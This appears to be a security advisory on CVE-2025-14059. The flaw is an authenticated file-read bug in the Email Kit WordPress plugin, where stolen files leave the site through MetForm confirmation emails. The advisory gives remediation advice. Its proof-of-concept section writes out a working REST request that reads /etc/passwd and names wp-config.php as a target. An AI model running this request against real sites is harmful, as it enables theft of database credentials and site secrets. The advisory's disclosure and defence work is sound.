CVE-2025-14059 affects Email Kit and it is a local file inclusion vulnerability that turns a normal email template feature into a reliable arbitrary file read primitive for an authenticated Author level user. The key reason it is serious is that it is not only about reading a file on the server. It also provides a built in exfiltration channel because the stolen file content can be delivered outward through MetForm confirmation emails to an attacker controlled mailbox. On real sites this means an Author account, which is common on marketing and content teams, can reach high value secrets like wp-config.php database credentials and authentication keys without needing administrator access, and without any direct file download feature being present.
| CVE | CVE-2025-14059 |
| Plugin Version | EmailKit <= 1.6.1 |
| All Time | 316 000 |
| Active installations | 60 000+ |
| Publicly Published | January 6, 2025 |
| Last Updated | January 6, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-14059 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/emailkit/emailkit-161-authenticated-author-arbitrary-file-read-via-path-traversal https://t.me/cleantalk_researches/379 |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| November 27, 2025 | Plugin testing and vulnerability detection in the Email Kit have been completed |
| November 27, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 6, 2025 | Registered CVE-2025-14059 |
Discovery of the Vulnerability
TThe bug sits in the Email Kit MetForm integration where the REST endpoint used to create a template accepts a user supplied template path and later uses it as input to file_get_contents without enforcing a safe base directory or an allow list of template files. In the attack flow the Author submits a request to the create template endpoint and sets emailkit editor template to an absolute path such as /etc/passwd or a relative traversal path to wp-config.php. Because there is no real path normalization and no prefix check, the plugin reads the target file and stores the content into the template content field that will later be used as an email body. The critical security failure is that the plugin validates the request with a nonce but does not validate what the path is allowed to be, so a feature intended to load an editor template becomes a server file reader controlled by the attacker.
Understanding of LFI attack’s
Local file inclusion in WordPress plugins often becomes catastrophic because WordPress installations routinely store secrets in predictable locations and formats. The most obvious target is wp-config.php which can expose database credentials, table prefixes, salts, and sometimes hardcoded API tokens or SMTP credentials. On Linux hosts, /etc/passwd can reveal usernames and service accounts that help an attacker tailor follow on attacks, and on shared hosting the ability to read neighboring configuration files can become a cross site reconnaissance tool. What makes CVE-2025-14059 stand out is the combination of LFI with an exfiltration mechanism. Even if the attacker cannot see server responses directly, they can force the server to send the file contents outward through a confirmation email, which is why this becomes.
Exploiting the LFI Vulnerability
To exploit CVE-2025-14059, an attacker with Author+ cookies:
POC:
0) Preporation: Activate Elementor, MetForm, EmailKit (and SMTP Server or wpml_plugin_log plugin)-> standart installation of this plugins. Create a new Form with required Email field and submit button Add to this form "Confirmation" and "Notification" as usually Add this shortcode to any Post Test this form and check messages in SMTP/inbox/plugin 1) Send this request from Author+ POST /wordpress/index.php?rest_route=/emailkit/v1/create-template HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php X-WP-Nonce: 423d6c2f27 DNT: 1 Sec-GPC: 1 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=3%7C1764443008%7CRjm5qxO19GkyJTIVWyibTEPAFUZowEf3R8sKMlHc4st%7Cd769097093f4c352387040ef525437b6d761d9296c6a237a232eff44373f9362; wp-settings-4=libraryContent%3Dbrowse; wp-settings-time-4=1764270208; spbc_secfw_ip_wl=adb2a133b016d4aeea259f85a613874f; bWYtY29va2ll=%242y%2412%24MKaker8pQx79%2Fu57DYjUf.jpiZrUbzt2v552Peg%2FtBZDe0sQIEKp.; spbc_is_logged_in=632abd71892139e01786143ba5519731; spbc_log_id=443; spbc_timer=1764270209; spbc_cookies_test=%7B%22cookies_names%22%3A%5B%22spbc_log_id%22%2C%22spbc_timer%22%5D%2C%22check_value%22%3A%22b5ccad2c02d1442f4b9f96881e34359d%22%7D Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4 Content-Type: application/x-www-form-urlencoded Content-Length: 101 form_id=152&template_title=test&emailkit_email_type=metform_form&emailkit-editor-template=/etc/passwd 2) Check email message with /etc/passwd____
The impact is high confidentiality loss with realistic escalation paths. Reading wp-config.php can immediately yield database credentials and WordPress authentication salts, which can enable database extraction, session forgery in some scenarios, or offline attacks against stored hashes depending on the environment. Exfiltration through email makes this even more damaging because it bypasses many defensive assumptions, such as lack of direct file download routes or restricted file system permissions on the web layer. A compromised Author account becomes a stepping stone to full site compromise because once secrets are obtained the attacker can pivot into database access, plugin settings theft, and further credential reuse. In marketing oriented sites, where MetForm is used for lead capture and Email Kit is used for templated notifications, the attacker can also hide the exfiltration in normal looking mail flows, which makes detection harder. The result is silent secret theft that looks like legitimate form traffic unless administrators are watching carefully.
Recommendations for Improved Security
The correct remediation is to treat any path parameter as untrusted and restrict it to safe, known locations. The plugin should normalize the provided path with realpath and enforce that it resides under an allow listed directory dedicated to Email Kit templates, and it should reject absolute paths and any traversal sequences. It should also avoid reading arbitrary files based on a request parameter at all, and instead reference templates by internal identifiers mapped to packaged assets. On the MetForm side, confirmation email bodies should not be filled from untrusted stored HTML that can be derived from filesystem reads, and template creation should require stricter capabilities than publish_posts if it can influence site wide email content. As operational mitigations while patching, reduce who has Author access, disable unnecessary confirmation emails, and review recent Email Kit template creations and MetForm bindings for unexpected template content. Finally rotate secrets if exposure is suspected, especially database credentials and WordPress salts, because once they are leaked they must be treated as compromised.
By taking proactive measures to address LFI like CVE-2025-14059 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #LFI #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.